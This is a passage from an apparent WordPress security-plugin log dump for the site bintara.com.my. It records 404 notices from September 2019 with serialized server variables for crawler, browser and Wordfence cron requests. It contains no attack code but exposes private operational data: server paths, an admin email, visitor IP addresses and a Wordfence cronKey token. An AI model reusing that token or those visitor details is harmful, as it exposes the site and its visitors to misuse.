14:41:41',31085608,32893984,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'42.153.139.143'),(26817,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:21:\"HTTP_PROXY_CONNECTION\";s:5:\"close\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\";s:8:\"HTTP_VIA\";s:32:\"1.0 J5K-Suburban (jaguar/3.0-11)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"42.113.193.239\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"41.73.9.101\";s:11:\"REMOTE_PORT\";s:5:\"58748\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYef3pfGhBqRtE5qMFchXAAAAJY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569169374.604\";s:12:\"REQUEST_TIME\";s:10:\"1569169374\";}}','notice','2019-09-22 16:22:57','2019-09-22 16:22:55',31201472,33008584,'https://bintara.com.my/?page_id=18',1,0,'42.113.193.239'),(26818,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:78:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=81d98e15cf989a08cef8b1a2b5818f7e\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:51:\"End of script output before headers: admin-ajax.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:91:\"action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=81d98e15cf989a08cef8b1a2b5818f7e\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"48124\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:116:\"/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=81d98e15cf989a08cef8b1a2b5818f7e\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:64:\"/home/norfaiz/public_html/bintara.com.my/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:24:\"/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYegbJfGhBqRtE5qMFchlQAAAIc\";s:19:\"REDIRECT_SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYegbJfGhBqRtE5qMFchlQAAAIc\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"48124\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:46:\"https://bintara.com.my/wp-admin/admin-ajax.php\";s:10:\"SCRIPT_URL\";s:24:\"/wp-admin/admin-ajax.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYegbJfGhBqRtE5qMFchlQAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569169532.3057\";s:12:\"REQUEST_TIME\";s:10:\"1569169532\";}}','notice','2019-09-22 16:25:34','2019-09-22 16:25:32',30850752,31103208,'https://bintara.com.my/wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&scanMode=standard&cronKey=81d98e15cf989a08cef8b1a2b5818f7e',1,0,'103.6.198.69'),(26819,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-20/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-20/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYe7-jXwAkGgnPePZ3G72wAAAE8\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-20/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.145\";s:11:\"REMOTE_PORT\";s:4:\"4887\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-20/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYe7-jXwAkGgnPePZ3G72wAAAE8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569176574.2816\";s:12:\"REQUEST_TIME\";s:10:\"1569176574\";}}','notice','2019-09-22 18:22:57','2019-09-22 18:22:54',30028896,31839520,'https://bintara.com.my/toughbook-20/',1,0,'207.46.13.145'),(26820,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:76:\"text/html, application/rss+xml, application/atom+xml, text/xml, text/rss+xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:75:\"Mozilla/5.0 (compatible; SemrushBot/6~bl; +http://www.semrush.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.229.168.144\";s:11:\"REMOTE_PORT\";s:5:\"46100\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYe9dDXwAkGgnPePZ3G7@AAAAEY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569176948.8016\";s:12:\"REQUEST_TIME\";s:10:\"1569176948\";}}','notice','2019-09-22 18:29:10','2019-09-22 18:29:09',30808264,32620864,'https://bintara.com.my/?page_id=11',1,0,'46.229.168.144'),(26821,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.12\";s:11:\"REMOTE_PORT\";s:5:\"54051\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYfH3MFqgMX-PLsgt8cixAAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569179612.6075\";s:12:\"REQUEST_TIME\";s:10:\"1569179612\";}}','notice','2019-09-22 19:13:35','2019-09-22 19:13:32',31308720,33121600,'https://bintara.com.my/?page_id=18',1,0,'223.206.243.12'),(26822,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/dropbox-business-features/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 QIHU 360SE/Nutch-1.13\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:49:\"https://bintara.com.my/dropbox-business-features/\";s:19:\"REDIRECT_SCRIPT_URL\";s:27:\"/dropbox-business-features/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYfhWrp66oO1SlzUVT6F3wAAAdY\";s:12:\"REDIRECT_URL\";s:27:\"/dropbox-business-features/\";s:11:\"REMOTE_ADDR\";s:14:\"192.198.98.172\";s:11:\"REMOTE_PORT\";s:5:\"20114\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:49:\"https://bintara.com.my/dropbox-business-features/\";s:10:\"SCRIPT_URL\";s:27:\"/dropbox-business-features/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYfhWrp66oO1SlzUVT6F3wAAAdY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569186138.1557\";s:12:\"REQUEST_TIME\";s:10:\"1569186138\";}}','notice','2019-09-22 21:02:19','2019-09-22 21:02:18',30752216,32559464,'https://bintara.com.my/dropbox-business-features/',1,0,'192.198.98.172'),(26823,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3315.3 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.28.114.170\";s:11:\"REMOTE_PORT\";s:5:\"50640\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYfoHsFqgMX-PLsgt8copgAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569187870.1263\";s:12:\"REQUEST_TIME\";s:10:\"1569187870\";}}','notice','2019-09-22 21:31:11','2019-09-22 21:31:10',30806208,32620408,'https://bintara.com.my/?page_id=18',1,0,'103.28.114.170'),(26824,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.12\";s:11:\"REMOTE_PORT\";s:5:\"49869\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYfzcsFqgMX-PLsgt8crCQAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569190770.2796\";s:12:\"REQUEST_TIME\";s:10:\"1569190770\";}}','notice','2019-09-22 22:19:31','2019-09-22 